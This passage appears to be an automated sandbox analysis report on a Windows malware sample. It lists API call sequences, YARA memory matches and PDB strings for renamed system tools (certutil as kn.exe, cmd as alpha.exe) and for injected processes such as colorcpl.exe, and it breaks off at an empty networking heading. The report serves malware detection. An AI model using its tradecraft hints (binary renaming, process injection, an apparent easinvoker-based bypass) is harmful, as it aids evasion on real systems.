                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,6_2_00007FF6A2A8E044
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,6_2_00007FF6A29D1DE8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A51E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A51E2C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,6_2_00007FF6A29F5DF7
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC5D74 CryptDecodeObjectEx,strcmp,strcmp,6_2_00007FF6A2AC5D74
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A19D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A19D6C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A21D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A21D70
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A43D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,6_2_00007FF6A2A43D60
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A97D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,6_2_00007FF6A2A97D3C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,6_2_00007FF6A2A9BD3C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6A29F5DA1
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1DD80 CertFindExtension,CryptDecodeObject,6_2_00007FF6A2A1DD80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A75D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,6_2_00007FF6A2A75D80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A97EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,6_2_00007FF6A2A97EE8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC5F20 CryptDecodeObjectEx,6_2_00007FF6A2AC5F20
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A17F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,6_2_00007FF6A2A17F14
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A55F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,6_2_00007FF6A2A55F04
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,6_2_00007FF6A2A8DE70
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC5E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,6_2_00007FF6A2AC5E3C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6A2A4DEB0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF6A2A1DEA4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_004338C8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F745FF CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_06F745FF
                  Source: colorcpl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  barindex
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00407538 _wcslen,CoGetObject,19_2_00407538
                  Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
                  Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
                  Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
                  Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.00000000219AE000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.000000002197D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000286E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000286B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
                  Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7823D35B8
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7823D35B8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF6A2AA234C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF6A2A3C6F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF6A2AA6F80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6A2AA10C4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6A2AA3100
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6A2A4B3D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A0D440
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF6A2A4D4A4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A83674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF6A2A83674
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF6A2A4DBC0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA19F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6A2AA19F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF6A2AA1B04
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A45E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF6A2A45E58
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02AA5908
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7823D35B8
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7823D35B8
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00860207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_00860207
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0086589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_0086589A
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00864EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00864EC1
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00873E66 FindFirstFileW,FindNextFileW,FindClose,16_2_00873E66
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0085532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_0085532E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_0040928E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041C322
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040C388
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_004096A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_00408847
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00407877 FindFirstFileW,FindNextFileW,19_2_00407877
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00419B86
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040BD72
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F485AE FindFirstFileW,FindNextFileW,19_2_06F485AE
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4A3D7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_06F4A3D7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4CAA9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_06F4CAA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5A8BD FindFirstFileW,19_2_06F5A8BD
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4C8A2 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_06F4C8A2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4957E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_06F4957E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4D0BF FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_06F4D0BF
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5D059 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_06F5D059
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F49FC5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_06F49FC5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,19_2_00407CD2

                  Networking

                  barindex
